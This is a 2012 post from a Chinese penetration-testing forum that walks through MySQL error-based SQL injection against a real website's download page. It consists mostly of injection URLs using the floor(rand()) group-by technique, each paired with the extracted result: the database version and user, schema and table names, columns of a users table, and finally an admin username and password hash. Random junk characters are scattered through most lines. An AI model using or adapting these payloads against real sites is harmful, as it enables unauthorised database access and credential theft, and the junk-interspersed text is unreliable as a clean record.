找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php+mysql高级爆错注入经测算有效
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2084|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-01666
0 L. \# Y  f9 @0 E0 s( q0 F# P" ^4 b! E6 h. _
之前想找个测试 没想到这有 可以测试下做个记录而已
/ ?- D: l: }9 ~# _( g- k
" ?* S/ b- H% M/ o0 @http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_0030 G$ ^8 H: L  S6 b/ Q
: H3 W: N: t3 X8 k, X: }: o" j
/data0/htdocs/leqi_new/app/myapp.php
4 Z8 @1 R2 f; n2 I+ M( X3 x0 n, S3 X# Q4 m7 F" d) ~
或者0 L2 ?5 o4 n/ H* K& p7 I& t$ p9 v0 g
  X8 N" Y& X# ~- k( D5 F( g1 B
/**********version()**********/ 5.1.49-log1 U  A, s! ]2 o+ B( W7 n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% l8 @) r& n7 r5 g
# @9 p4 n4 c; E% N' c7 f0 \4 u/**********user()**********/  
4 B# O9 g( }% t3 Y5 _3 |http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0036 L' r7 V1 h$ r* a4 M& y
6 s+ G4 i/ t9 e' @
/**********database()**********/  leqi
) ]% I, r% y9 r7 z/ R2 a% yhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* v8 G$ D* i# U7 _9 g# }) p
5 p8 n( @( w3 p" u+ v
/**********limit依次递归爆库**********/0 S: E$ z, q* K7 p* |- R% A7 f
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% j* S' t. e0 n* V% k, u
information_schema0 N* p7 a  R" H. A1 p
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- k& N% [% O2 E' W$ gleqi8 N( k4 V$ ^! k  W
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 c- t6 a. K" U7 ]- R4 wtest" Q, e! @( G( D( P

4 b: G' t- {# H/**********limit依次递归爆表名**********/! o* z9 D+ q7 r: w( J6 t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 L. \/ N! r6 L( @3 L. P2 w# R4 y; Busers
. t  d' T$ k# O; g# o7 `% H6 U; `% f0 t9 ~; \
/**********limit依次递归爆字段名**********/4 j2 D% F4 ^$ s5 ]  g4 g0 t
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# r3 f1 p: w9 T* k9 K" _
user_id,username,nickname,passwd,group_id- T" A; K) r6 _
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 Q; a0 M) D* A- M; e/wapc/5000_0005_003: I; I$ Q' K+ t
11 21
$ @9 O3 ]1 r& q! U1 C7 ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23* Q6 I- v$ {, ]; \7 j0 }5 V
/wapc/5000_0005_0031 o; C+ T- M9 [( ^& i6 m# c, m6 X
11 341 351 3615 c' S/ u) C0 d4 f$ K
/**********爆数据**********/5 k, x' D8 L0 g5 [$ f4 {
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ Q3 X" L( g; P' P" J
admin- y: L+ r3 |- o2 n
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% O' A6 Z! I! l$ \& K6a8b4574ca231eb8bd52764d4978ffcd
6 l1 N' s/ L+ Y6 S! ^$ e" s  x
( h; G4 q: W3 y/ w* R
( C7 A: j* b1 R2 h. R
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表